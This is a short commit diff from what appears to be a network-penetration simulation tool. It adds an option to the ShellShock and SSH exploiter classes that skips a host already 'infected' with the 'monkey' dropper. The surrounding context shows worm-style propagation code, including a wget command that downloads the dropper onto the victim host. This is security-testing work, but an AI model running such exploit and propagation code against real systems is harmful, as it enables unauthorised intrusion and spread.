Issue #33 - Added support for skip_exploit_if_file_exist in linux

This commit is contained in:
daniel goldberg 2016-08-29 13:34:21 +03:00
parent f78fe6c4f4
commit 1806f9bc62
2 changed files with 16 additions and 3 deletions

View File

@ -34,6 +34,7 @@ class ShellShockExploiter(HostExploiter):
self.success_flag = ''.join( self.success_flag = ''.join(
choice(string.ascii_uppercase + string.digits choice(string.ascii_uppercase + string.digits
) for _ in range(20)) ) for _ in range(20))
self.skip_exist = self._config.skip_exploit_if_file_exist
def exploit_host(self, host, depth=-1, src_path=None): def exploit_host(self, host, depth=-1, src_path=None):
assert isinstance(host, VictimHost) assert isinstance(host, VictimHost)
@ -93,6 +94,13 @@ class ShellShockExploiter(HostExploiter):
src_path = src_path or get_target_monkey(host) src_path = src_path or get_target_monkey(host)
# copy the monkey
dropper_target_path_linux = self._config.dropper_target_path_linux
if (self.skip_exist) and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.info("Host %s was already infected under the current configuration, done" % host)
return True # return already infected
if not src_path: if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host) LOG.info("Can't find suitable monkey executable for host %r", host)
return False return False
@ -103,9 +111,6 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.") LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
return False return False
# copy the monkey
dropper_target_path_linux = self._config.dropper_target_path_linux
download_command = '/usr/bin/wget %s -O %s;' % ( download_command = '/usr/bin/wget %s -O %s;' % (
http_path, dropper_target_path_linux) http_path, dropper_target_path_linux)

View File

@ -22,6 +22,7 @@ class SSHExploiter(HostExploiter):
def __init__(self): def __init__(self):
self._config = __import__('config').WormConfiguration self._config = __import__('config').WormConfiguration
self._update_timestamp = 0 self._update_timestamp = 0
self.skip_exist = self._config.skip_exploit_if_file_exist
def log_transfer(self, transferred, total): def log_transfer(self, transferred, total):
if time.time() - self._update_timestamp > TRANSFER_UPDATE_RATE: if time.time() - self._update_timestamp > TRANSFER_UPDATE_RATE:
@ -107,6 +108,13 @@ class SSHExploiter(HostExploiter):
LOG.info("Can't find suitable monkey executable for host %r", host) LOG.info("Can't find suitable monkey executable for host %r", host)
return False return False
if self._config.skip_exploit_if_file_exist:
_, stdout, _ = ssh.exec_command("head -c 1 %s" % self._config.dropper_target_path_linux)
if stdout:
# file exists
LOG.info("Host %s was already infected under the current configuration, done" % host)
return True # return already infected
try: try:
ftp = ssh.open_sftp() ftp = ssh.open_sftp()